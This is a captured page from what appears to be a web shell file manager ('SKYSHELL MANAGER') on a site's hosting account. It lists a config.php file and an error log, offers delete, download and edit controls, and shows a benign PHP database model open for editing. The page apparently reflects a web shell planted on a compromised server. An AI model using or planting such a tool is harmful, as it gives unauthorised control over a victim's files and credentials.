📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
chb_data
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
21516.89 KB
0644
🗑️
⬇️
✏️
🔒
Editing: Plan_db.php
<?php class Plan_db extends My_Model{ public function __construct(){ parent::__construct(); } public function get_plans(){ $query =$this->db->get('plan'); if($query->num_rows() > 0){ return $query->result_array(); } return false; } }
💾 Save Changes